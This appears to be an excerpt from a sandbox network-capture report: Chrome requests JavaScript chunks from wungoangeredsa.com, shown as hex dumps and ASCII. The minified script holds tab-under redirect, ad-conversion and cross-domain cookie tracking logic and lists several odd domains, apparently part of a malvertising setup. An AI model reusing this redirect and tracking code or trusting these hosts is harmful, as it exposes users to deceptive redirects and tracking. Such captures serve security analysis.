                                                                                                          Data Ascii: ef278913a",10449:"9775da4a2751485b",10622:"184d1968eab9b56a",10648:"c1810e3b023ec1d6",10809:"dd8346a6e3b35c6e",11013:"bb4b3135c105d2a9",11085:"c6cfdd8f1ff8b331",11485:"bff665cf6473f9a3",11504:"edad189aa37887a4",11711:"224e2b1af3215490",12173:"5f0fd85a35df
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 38 38 39 64 36 39 32 39 31 64 63 38 33 39 39 22 2c 32 35 34 37 32 3a 22 63 62 64 39 39 35 31 31 38 33 61 37 35 33 31 62 22 2c 32 35 38 38 38 3a 22 62 65 63 63 31 37 37 64 33 61 38 31 34 30 62 65 22 2c 32 35 39 30 30 3a 22 39 31 36 64 39 64 38 62 35 61 39 33 36 39 39 30 22 2c 32 36 32 31 38 3a 22 38 30 34 62 38 63 35 32 30 37 30 31 61 32 38 63 22 2c 32 36 33 37 31 3a 22 63 38 66 34 63 66 62 61 34 63 61 37 65 66 35 31 22 2c 32 36 37 32 37 3a 22 31 36 30 32 61 33 65 65 31 62 32 34 32 39 61 37 22 2c 32 37 31 35 30 3a 22 63 61 31 64 39 38 36 63 66 36 62 30 63 36 61 38 22 2c 32 37 35 39 35 3a 22 36 64 38 35 39 64 66 61 34 66 32 64 35 39 61 66 22 2c 32 37 38 31 37 3a 22 32 36 39 33 65 35 37 65 38 36 36 33 32 38 61 32 22 2c 32 37 38 37 36 3a 22 62 35 64 39 66 39
                                                                                                          Data Ascii: 889d69291dc8399",25472:"cbd9951183a7531b",25888:"becc177d3a8140be",25900:"916d9d8b5a936990",26218:"804b8c520701a28c",26371:"c8f4cfba4ca7ef51",26727:"1602a3ee1b2429a7",27150:"ca1d986cf6b0c6a8",27595:"6d859dfa4f2d59af",27817:"2693e57e866328a2",27876:"b5d9f9
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 35 35 36 3a 22 30 64 39 64 31 37 34 61 39 37 62 34 65 61 66 35 22 2c 33 38 36 32 35 3a 22 66 65 62 37 39 39 30 62 62 33 30 39 38 66 34 61 22 2c 33 38 38 38 32 3a 22 65 32 38 39 31 35 34 39 33 33 34 36 39 38 37 30 22 2c 33 38 38 39 30 3a 22 31 64 34 31 65 30 33 36 66 38 31 34 34 34 64 31 22 2c 33 38 39 30 34 3a 22 32 36 35 64 36 30 61 39 31 66 64 33 64 36 62 38 22 2c 33 38 39 34 34 3a 22 63 66 63 62 33 34 30 30 61 36 39 30 31 62 35 65 22 2c 33 38 39 39 36 3a 22 37 30 66 31 62 34 36 62 66 37 33 39 66 63 39 39 22 2c 33 39 30 36 38 3a 22 30 66 35 34 62 62 64 65 66 35 38 30 31 31 64 37 22 2c 33 39 33 31 34 3a 22 37 61 30 65 30 63 65 31 35 61 31 30 37 33 36 64 22 2c 33 39 34 32 36 3a 22 65 66 38 39 32 64 33 32 65 34 64 32 65 33 38 38 22 2c 33 39 36 39 37 3a 22
                                                                                                          Data Ascii: 556:"0d9d174a97b4eaf5",38625:"feb7990bb3098f4a",38882:"e289154933469870",38890:"1d41e036f81444d1",38904:"265d60a91fd3d6b8",38944:"cfcb3400a6901b5e",38996:"70f1b46bf739fc99",39068:"0f54bbdef58011d7",39314:"7a0e0ce15a10736d",39426:"ef892d32e4d2e388",39697:"
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 63 22 2c 34 38 35 30 39 3a 22 30 34 32 61 64 61 38 65 36 31 37 31 62 33 37 37 22 2c 34 38 35 33 30 3a 22 33 30 63 66 36 32 61 37 34 30 66 64 63 35 62 31 22 2c 34 39 30 35 31 3a 22 64 30 31 61 31 63 65 39 39 32 30 37 35 34 64 35 22 2c 34 39 31 33 37 3a 22 36 62 38 39 30 34 33 38 38 64 31 34 64 65 33 38 22 2c 34 39 31 39 30 3a 22 36 63 32 38 32 31 63 38 30 65 63 39 32 64 39 66 22 2c 34 39 35 35 34 3a 22 38 36 66 63 33 36 32 31 34 61 34 35 31 32 62 35 22 2c 34 39 39 37 30 3a 22 36 32 31 30 32 36 31 61 34 32 62 66 36 65 39 36 22 2c 35 30 31 36 32 3a 22 32 64 36 30 33 63 32 38 37 33 33 66 36 36 63 32 22 2c 35 30 32 37 32 3a 22 66 65 65 34 34 31 32 39 64 63 37 64 66 66 66 33 22 2c 35 30 32 39 37 3a 22 31 35 65 37 31 33 31 64 61 36 34 37 36 37 66 61 22 2c 35 30
                                                                                                          Data Ascii: c",48509:"042ada8e6171b377",48530:"30cf62a740fdc5b1",49051:"d01a1ce9920754d5",49137:"6b8904388d14de38",49190:"6c2821c80ec92d9f",49554:"86fc36214a4512b5",49970:"6210261a42bf6e96",50162:"2d603c28733f66c2",50272:"fee44129dc7dfff3",50297:"15e7131da64767fa",50
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 35 33 33 35 35 33 35 22 2c 35 39 32 35 35 3a 22 39 66 61 35 32 34 65 33 32 32 34 61 39 38 35 63 22 2c 35 39 33 36 39 3a 22 64 36 37 39 66 33 31 37 33 30 36 66 63 31 37 64 22 2c 35 39 37 33 31 3a 22 38 65 39 34 30 31 33 32 62 31 35 38 61 36 38 32 22 2c 35 39 38 30 31 3a 22 62 38 38 65 61 62 35 37 66 32 36 37 36 66 62 66 22 2c 35 39 38 39 34 3a 22 37 30 31 31 34 65 39 62 36 61 32 62 65 64 38 34 22 2c 36 30 33 31 37 3a 22 39 39 64 65 31 37 65 61 34 33 64 63 65 38 63 37 22 2c 36 30 33 38 33 3a 22 66 39 37 31 65 64 35 35 30 32 38 35 61 33 63 62 22 2c 36 30 35 32 31 3a 22 36 63 36 66 34 30 33 31 34 38 32 32 62 37 62 63 22 2c 36 30 39 34 36 3a 22 34 33 30 64 62 39 32 37 66 61 31 61 33 64 36 63 22 2c 36 31 36 30 31 3a 22 36 30 34 34 61 61 35 62 61 63 35 37 31 30
                                                                                                          Data Ascii: 5335535",59255:"9fa524e3224a985c",59369:"d679f317306fc17d",59731:"8e940132b158a682",59801:"b88eab57f2676fbf",59894:"70114e9b6a2bed84",60317:"99de17ea43dce8c7",60383:"f971ed550285a3cb",60521:"6c6f40314822b7bc",60946:"430db927fa1a3d6c",61601:"6044aa5bac5710
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 34 65 32 37 37 34 62 34 38 31 61 62 66 22 2c 36 39 32 38 34 3a 22 38 38 36 63 63 62 34 36 35 38 64 65 35 61 63 35 22 2c 36 39 33 36 38 3a 22 62 36 63 39 36 39 38 34 65 65 63 64 30 36 66 31 22 2c 36 39 36 37 34 3a 22 32 62 35 65 61 33 66 63 39 61 61 32 61 66 63 33 22 2c 36 39 37 32 32 3a 22 38 38 30 37 64 38 37 63 38 35 62 66 33 35 64 33 22 2c 36 39 37 38 31 3a 22 35 31 38 36 65 64 34 37 35 63 39 61 36 61 39 62 22 2c 37 30 31 37 34 3a 22 38 62 31 38 39 35 34 31 39 37 37 32 39 30 38 33 22 2c 37 30 33 34 32 3a 22 39 34 66 31 36 65 30 35 62 34 33 31 63 63 66 39 22 2c 37 30 34 35 35 3a 22 62 62 66 62 66 32 31 65 34 37 31 36 31 36 35 30 22 2c 37 30 35 35 33 3a 22 33 30 37 64 64 64 35 30 31 34 34 33 66 30 32 37 22 2c 37 31 31 31 39 3a 22 31 65 31 34 61 65 30 35
                                                                                                          Data Ascii: 4e2774b481abf",69284:"886ccb4658de5ac5",69368:"b6c96984eecd06f1",69674:"2b5ea3fc9aa2afc3",69722:"8807d87c85bf35d3",69781:"5186ed475c9a6a9b",70174:"8b18954197729083",70342:"94f16e05b431ccf9",70455:"bbfbf21e47161650",70553:"307ddd501443f027",71119:"1e14ae05
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 39 3a 22 32 66 31 65 62 39 37 35 33 66 33 38 35 31 65 37 22 2c 37 38 36 37 37 3a 22 38 34 64 64 65 34 37 30 61 31 30 32 38 31 31 37 22 2c 37 38 38 30 36 3a 22 32 39 36 65 65 37 63 38 31 32 32 31 35 64 65 30 22 2c 37 38 39 31 31 3a 22 38 33 64 65 63 63 30 38 35 36 33 38 66 31 33 34 22 2c 37 38 39 37 36 3a 22 64 65 66 34 32 61 36 30 64 36 30 36 64 31 63 32 22 2c 37 38 39 38 37 3a 22 30 65 62 66 39 31 66 34 62 63 35 64 31 33 33 30 22 2c 37 39 31 30 34 3a 22 36 63 66 35 35 61 66 37 61 30 61 33 63 31 33 36 22 2c 37 39 32 32 34 3a 22 31 35 61 37 37 30 64 37 61 36 37 62 31 37 31 34 22 2c 37 39 33 36 32 3a 22 33 39 63 33 31 33 37 38 37 37 35 62 66 31 37 32 22 2c 37 39 37 33 38 3a 22 62 33 31 32 37 33 30 66 62 31 38 61 39 38 65 37 22 2c 37 39 39 32 30 3a 22 61 36
                                                                                                          Data Ascii: 9:"2f1eb9753f3851e7",78677:"84dde470a1028117",78806:"296ee7c812215de0",78911:"83decc085638f134",78976:"def42a60d606d1c2",78987:"0ebf91f4bc5d1330",79104:"6cf55af7a0a3c136",79224:"15a770d7a67b1714",79362:"39c31378775bf172",79738:"b312730fb18a98e7",79920:"a6
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 22 2c 38 38 39 31 36 3a 22 31 36 61 30 61 61 36 63 35 38 36 36 65 39 33 30 22 2c 38 38 39 36 33 3a 22 63 38 33 65 31 35 63 65 36 38 37 37 34 65 61 38 22 2c 38 38 39 39 35 3a 22 30 64 66 66 33 34 62 37 39 35 62 30 30 63 66 37 22 2c 38 39 31 36 33 3a 22 39 64 30 64 34 38 61 34 38 39 34 37 39 65 39 38 22 2c 38 39 32 35 30 3a 22 36 34 36 32 36 36 38 37 63 36 34 30 35 33 62 34 22 2c 38 39 32 38 30 3a 22 32 39 38 33 66 36 39 62 63 34 62 37 36 39 61 63 22 2c 38 39 34 35 39 3a 22 38 30 62 31 66 33 35 65 31 34 62 35 66 61 35 62 22 2c 38 39 35 35 35 3a 22 61 65 66 39 39 30 66 39 63 66 30 61 36 39 30 66 22 2c 38 39 36 30 37 3a 22 30 38 36 36 35 32 65 65 61 64 66 32 62 63 37 35 22 2c 38 39 36 31 37 3a 22 39 32 33 64 64 63 63 65 66 32 34 31 38 36 35 37 22 2c 38 39 39
                                                                                                          Data Ascii: ",88916:"16a0aa6c5866e930",88963:"c83e15ce68774ea8",88995:"0dff34b795b00cf7",89163:"9d0d48a489479e98",89250:"64626687c64053b4",89280:"2983f69bc4b769ac",89459:"80b1f35e14b5fa5b",89555:"aef990f9cf0a690f",89607:"086652eeadf2bc75",89617:"923ddccef2418657",899


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          30192.168.2.450076104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:20 UTC412OUTGET /_next/static/chunks/8d3443188ef1fee1-1736072686539.437b26541c6a284a.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-1ba5"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1626
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415eaea98cec-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 31 62 61 35 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 36 39 35 30 5d 2c 7b 32 37 39 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20 72 3d 74 28 37 30 38 36 35 29 2c 69 3d 74 28 39 36 36 37 30 29 2c 6f 3d 74 28 32 34 31 35 36 29 2c 61 3d 74 28 31 37 39 36 39 29 2c 73 3d 74 28 37 31 39 36 31 29 2c 63 3d 74 28 33 31 34 35 36 29 2c 75 3d 74 28 38 37 37 32 32 29 2c 6c 3d 74 28 39 37 38 39 37 29 2c 64 3d 74 28 35 33 34 34 34 29 2c 76 3d 74 28 32 39 37 35 34 29 2c 66 3d 74 28
                                                                                                          Data Ascii: 1ba5"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[96950],{2798:function(e,n,t){t.d(n,{d:function(){return b}});var r=t(70865),i=t(96670),o=t(24156),a=t(17969),s=t(71961),c=t(31456),u=t(87722),l=t(97897),d=t(53444),v=t(29754),f=t(
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 20 64 6f 65 73 20 6e 6f 74 20 67 65 74 20 74 72 69 67 67 65 72 65 64 20 69 6e 20 74 68 65 20 64 65 76 20 6d 6f 64 65 22 29 2c 5f 26 26 49 28 7b 65 76 65 6e 74 3a 6c 2e 5f 2e 43 4f 4e 56 45 52 53 49 4f 4e 5f 44 49 53 41 42 4c 45 44 5f 44 45 56 45 4c 4f 50 4d 45 4e 54 5f 4d 4f 44 45 7d 29 2c 21 30 29 3a 6e 3f 55 7c 7c 64 2e 6e 2e 73 3f 4f 3f 67 3f 79 3f 28 28 30 2c 73 2e 63 4d 29 28 22 55 73 65 72 20 68 61 73 20 6d 61 64 65 20 63 6f 6e 76 20 6f 6e 20 74 68 65 20 6f 74 68 65 72 20 64 6f 6d 61 69 6e 2e 20 49 73 4e 6f 6e 55 6e 69 71 75 65 43 72 6f 73 73 20 3d 22 2c 79 29 2c 5f 26 26 49 28 7b 65 76 65 6e 74 3a 6c 2e 5f 2e 43 4f 4e 56 45 52 53 49 4f 4e 5f 44 49 53 41 42 4c 45 44 5f 4e 4f 4e 5f 55 4e 49 51 55 45 5f 43 52 4f 53 53 5f 44 4f 4d 41 49 4e 7d 29 2c 21
                                                                                                          Data Ascii: does not get triggered in the dev mode"),_&&I({event:l._.CONVERSION_DISABLED_DEVELOPMENT_MODE}),!0):n?U||d.n.s?O?g?y?((0,s.cM)("User has made conv on the other domain. IsNonUniqueCross =",y),_&&I({event:l._.CONVERSION_DISABLED_NON_UNIQUE_CROSS_DOMAIN}),!
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 61 75 64 69 65 6e 63 65 49 64 29 26 26 21 21 28 6e 75 6c 6c 3d 3d 3d 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 70 61 72 74 6e 65 72 29 26 26 74 2e 69 73 45 6e 61 62 6c 65 64 2c 45 3d 7b 65 76 65 6e 74 3a 6c 2e 5f 2e 43 4f 4e 56 45 52 53 49 4f 4e 7d 3b 66 26 26 28 45 3d 28 30 2c 69 2e 5a 29 28 28 30 2c 72 2e 5a 29 28 7b 7d 2c 45 29 2c 7b 61 75 64 69 74 6f 72 79 3a 74 2e 61 75 64 69 65 6e 63 65 49 64 7d 29 29 3b 76 61 72 20 4e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 28 30 2c 75 2e 63 29 28 7b 65 76 65 6e 74 3a 6c 2e 5f 2e 43 4f 4e 56 45 52 53 49 4f 4e 2c 73 75 62 49 64 3a 6e 75 6c 6c 21 3d 3d 55 26 26 76 6f 69 64 20 30 21 3d 3d 55 3f 55 3a 64 2e 6e 2e 73 7d 29 2c 28
                                                                                                          Data Ascii: void 0===t?void 0:t.audienceId)&&!!(null===t||void 0===t?void 0:t.partner)&&t.isEnabled,E={event:l._.CONVERSION};f&&(E=(0,i.Z)((0,r.Z)({},E),{auditory:t.audienceId}));var N=function(e,n){(0,u.c)({event:l._.CONVERSION,subId:null!==U&&void 0!==U?U:d.n.s}),(
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 29 29 2c 63 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 63 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 61 70 70 65 6e 64 28 65 2c 63 5b 65 5d 29 7d 29 29 3b 76 61 72 20 66 3d 73 2e 6e 2e 70 72 65 76 69 65 77 3f 76 6f 69 64 20 30 3a 6c 28 7b 7a 6f 6e 65 54 79 70 65 3a 6f 2e 77 2e 74 61 62 55 6e 64 65 72 2c 7a 6f 6e 65 44 65 74 61 69 6c 73 3a 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 7a 6f 6e 65 73 44 65 74 61 69 6c 73 2c 74 61 62 3a 22 63 75 72 72 65 6e 74 22 7d 29 3b 28 30 2c 72 2e 50 4e 29 28 22 52 45 44 49 52 45 43 54 20 3d 3e 20 74 61 62 20 63 75 72 72 65 6e 74 3a 20 22 2e 63 6f 6e 63 61 74 28 66 2c 22 2c 20 6e 65 77 20 74 61 62 3a 20 22
                                                                                                          Data Ascii: )),c&&Object.keys(c).forEach((function(e){d.searchParams.append(e,c[e])}));var f=s.n.preview?void 0:l({zoneType:o.w.tabUnder,zoneDetails:null===n||void 0===n?void 0:n.zonesDetails,tab:"current"});(0,r.PN)("REDIRECT => tab current: ".concat(f,", new tab: "
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 22 7d 2c 34 36 38 38 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 75 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 7d 29 3b 76 61 72 20 72 3d 74 28 34 32 38 33 38 29 2c 69 3d 74 28 31 32 31 33 39 29 2c 6f 3d 74 28 32 39 37 35 34 29 2c 61 3d 74 28 35 30 39 33 30 29 2c 73 3d 69 2e 75 73 65 4c 61 79 6f 75 74 45 66 66 65 63 74 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 76 61 72 20 6e 2c 74 3d 28 30 2c 69 2e 75 73 65 52 65 66 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 6e 20 65 76 65 6e 74 20 68 61 6e 64 6c 65 72 20 77 68 69 6c 65 20 72 65 6e 64 65 72 69
                                                                                                          Data Ascii: o, Helvetica, sans-serif"},46889:function(e,n,t){t.d(n,{u:function(){return l}});var r=t(42838),i=t(12139),o=t(29754),a=t(50930),s=i.useLayoutEffect;function c(e){var n,t=(0,i.useRef)((function(){throw new Error("Cannot call an event handler while renderi
                                                                                                          2025-01-06 11:09:21 UTC736INData Raw: 65 2c 74 29 3b 72 65 74 75 72 6e 20 61 3f 76 28 61 29 3a 69 7d 63 61 74 63 68 28 73 29 7b 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 22 2e 63 6f 6e 63 61 74 28 74 2c 22 53 74 6f 72 61 67 65 20 6b 65 79 20 5c 75 32 30 31 63 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 5c 75 32 30 31 64 3a 22 29 2c 73 29 2c 69 7d 7d 29 2c 5b 6e 2c 65 2c 76 2c 74 5d 29 2c 45 3d 28 30 2c 69 2e 75 73 65 53 74 61 74 65 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 3f 66 28 29 3a 28 30 2c 72 2e 5a 29 28 6e 2c 46 75 6e 63 74 69 6f 6e 29 3f 6e 28 29 3a 6e 7d 29 29 2c 62 3d 45 5b 30 5d 2c 5f 3d 45 5b 31 5d 2c 4e 3d 63 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 74 72 79 7b 76 61 72 20 69 3d 28 30 2c 72 2e 5a
                                                                                                          Data Ascii: e,t);return a?v(a):i}catch(s){return console.warn("Error reading ".concat(t,"Storage key \u201c").concat(e,"\u201d:"),s),i}}),[n,e,v,t]),E=(0,i.useState)((function(){return l?f():(0,r.Z)(n,Function)?n():n})),b=E[0],_=E[1],N=c((function(n){try{var i=(0,r.Z
                                                                                                          2025-01-06 11:09:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          31192.168.2.450075104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC412OUTGET /_next/static/chunks/27da6a71c55717fa-1736072686539.1f230f14e978af7b.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-36f1"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415ecf03f799-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 33 36 66 31 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 33 35 35 37 5d 2c 7b 39 30 39 37 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 2c 65 29 7b 65 2e 64 28 69 2c 7b 41 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 7d 29 3b 76 61 72 20 74 3d 65 28 39 38 37 38 38 29 2c 6f 3d 65 28 34 32 38 33 38 29 2c 72 3d 65 28 37 30 38 36 35 29 2c 61 3d 65 28 39 36 36 37 30 29 2c 63 3d 65 28 32 32 39 37 30 29 2c 73 3d 65 28 32 39 35 30 35 29 2c 75 3d 65 28 31 33 39 32 33 29 2c 6c 3d 65 28 37 31 39 36 31 29 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 28 30 2c 74 2e 5a 29
                                                                                                          Data Ascii: 36f1"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[73557],{9097:function(n,i,e){e.d(i,{A:function(){return d}});var t=e(98788),o=e(42838),r=e(70865),a=e(96670),c=e(22970),s=e(29505),u=e(13923),l=e(71961),d=function(){var n=(0,t.Z)
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 66 29 7d 29 5d 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 28 6d 3d 63 2e 73 65 6e 74 28 29 29 2e 6f 6b 3f 5b 33 2c 34 5d 3a 5b 34 2c 6d 2e 74 65 78 74 28 29 5d 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 76 3d 63 2e 73 65 6e 74 28 29 2c 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 63 68 65 63 6b 43 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6f 6b 69 65 20 2d 20 46 65 74 63 68 20 66 61 69 6c 65 64 20 77 69 74 68 20 73 74 61 74 75 73 3a 20 22 2e 63 6f 6e 63 61 74 28 6d 2e 73 74 61 74 75 73 2c 22 2c 20 6d 65 73 73 61 67 65 3a 20 22 29 2e 63 6f 6e 63 61 74 28 76 29 29 2c 5b 32 2c 6e 75 6c 6c 5d 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 5b 34 2c 6d 2e 6a 73 6f 6e 28
                                                                                                          Data Ascii: cation/json"},body:JSON.stringify(f)})];case 2:return(m=c.sent()).ok?[3,4]:[4,m.text()];case 3:return v=c.sent(),console.error("checkCrossDomainCookie - Fetch failed with status: ".concat(m.status,", message: ").concat(v)),[2,null];case 4:return[4,m.json(
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 65 74 69 6d 65 20 6e 6f 74 20 73 65 74 22 29 2c 28 30 2c 6c 2e 63 4d 29 28 22 63 68 65 63 6b 43 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6f 6b 69 65 5c 6e 44 65 66 61 75 6c 74 20 63 6f 6f 6b 69 65 20 6c 69 66 65 74 69 6d 65 3a 20 22 2e 63 6f 6e 63 61 74 28 6e 2e 72 65 6d 61 69 6e 69 6e 67 54 74 6c 29 29 2c 28 30 2c 73 2e 64 38 29 28 6e 2e 6e 61 6d 65 2c 6e 2e 76 61 6c 75 65 2c 7b 6d 61 78 41 67 65 3a 6e 2e 72 65 6d 61 69 6e 69 6e 67 54 74 6c 2c 70 61 74 68 3a 22 2f 22 7d 29 7d 65 6c 73 65 28 30 2c 6c 2e 63 4d 29 28 22 63 68 65 63 6b 43 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6f 6b 69 65 5c 6e 43 6f 6f 6b 69 65 20 22 2e 63 6f 6e 63 61 74 28 6e 2e 6e 61 6d 65 2c 22 20 6e 6f 74 20 65 78 69 73 74 22 29 29 7d 29 29 2c 5b 32 2c 6b 5d 3b 63 61 73 65 20 36 3a 72 65 74 75
                                                                                                          Data Ascii: etime not set"),(0,l.cM)("checkCrossDomainCookie\nDefault cookie lifetime: ".concat(n.remainingTtl)),(0,s.d8)(n.name,n.value,{maxAge:n.remainingTtl,path:"/"})}else(0,l.cM)("checkCrossDomainCookie\nCookie ".concat(n.name," not exist"))})),[2,k];case 6:retu
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 75 6c 6c 21 3d 3d 28 74 3d 28 30 2c 6f 2e 65 6a 29 28 6e 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 30 22 2c 31 30 29 7d 7d 2c 35 30 36 35 36 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 2c 65 29 7b 65 2e 64 28 69 2c 7b 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 7d 29 3b 76 61 72 20 74 3d 65 28 31 32 31 33 39 29 2c 6f 3d 65 28 36 31 36 35 36 29 2c 72 3d 65 28 38 33 32 31 36 29 2c 61 3d 65 28 37 31 39 36 31 29 2c 63 3d 65 28 33 35 31 34 37 29 2c 73 3d 65 28 32 31 38 31 38 29 2c 75 3d 65 28 35 31 36 35 39 29 2c 6c 3d 65 28 39 34 33 39 37 29 2c 64 3d 65 28 31 39 34 39 35 29 2c 66 3d 5b 22 63 6f 61 6a 75 74 6f 61 2e 63 6f 6d 22 2c 22 66 75 72 67 6f 6f 6d 69 2e 63 6f 6d 22 2c 22 6b 61 62 6f 72 74 6f 74 2e 63 6f 6d 22 5d 2c 6d 3d 66
                                                                                                          Data Ascii: ull!==(t=(0,o.ej)(n))&&void 0!==t?t:"0",10)}},50656:function(n,i,e){e.d(i,{N:function(){return m}});var t=e(12139),o=e(61656),r=e(83216),a=e(71961),c=e(35147),s=e(21818),u=e(51659),l=e(94397),d=e(19495),f=["coajutoa.com","furgoomi.com","kabortot.com"],m=f
